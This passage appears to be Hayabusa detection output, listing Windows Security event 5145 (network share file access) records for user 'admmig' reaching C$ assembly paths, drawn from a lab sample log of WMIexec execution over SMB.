0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\19b334bb62b3c76cfcc7137bb03371c3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b#\822ee6a8aa9386352052b7bd2610f3b5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62#\ab00f4aa6892c4c6d39b87f078e8208f | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b#\93b57911ae369118b40a5605c448eb9d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.R251a4777# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.R251a4777#\b090c87f42b1af785a6a9d1c43c201c6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c#\c59f97903ad4de423586f3a75eb8939d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S1bc92e04# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S1bc92e04#\f6f9e39cc765b7ceda89fc7893e0f74c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S8ca2c749# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S8ca2c749#\7ddbc8b883fb594b4efd9f4b016a4657 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S54faafb0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S54faafb0#\54486a01e573ae88df2c9fc21771e5ef | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via 
SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0#\29e4fb69d6e2ff119c3e89fe9f23ea71 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S88747207# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S88747207#\e998cb40c6a3657a6090a653616ee0d2 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sa56e3556# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sa56e3556#\2da102d7caf13b4e082aabda839cabfd | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sb6a1f1bc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sb6a1f1bc#\05a925477e72821ff9fa9527061d8527 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.T9d753d8c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.T9d753d8c#\9543db50e278526c3ba397cf5c7862cb | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te49ad7d9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te49ad7d9#\1834f24e507a831c635b80067fc7a428 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te3736ca4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te3736ca4#\f98240dfe778b4b39045d17817485b8a | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ud0e65fb9# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ud0e65fb9#\bb434af0d1c0846eba8f3fc7986a5cdc | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\b59fee046dfa048ec5f5180dc88f835d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V4381984f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V4381984f#\07b01287acdaf4ef356c3918db535afd | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vb0a86591# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vb0a86591#\a45750f13b28bdd0fb2adff38d6cd46f | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via 
SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vf4833439# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vf4833439#\fdcc95e5c05a2fec4f9c33b7e325ccd8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.VisualC | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.VisualC\999abcb4ea322b606c8f211d12ccb5a0 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W0bb5dac4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W0bb5dac4#\f5bca9052007da4e51412dc152a52942 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2bac6884# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2bac6884#\26a1a0abca839c13b1337a076531d7a2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d29a719# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d29a719#\d0b3dad21720f265098f1e94984349f8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 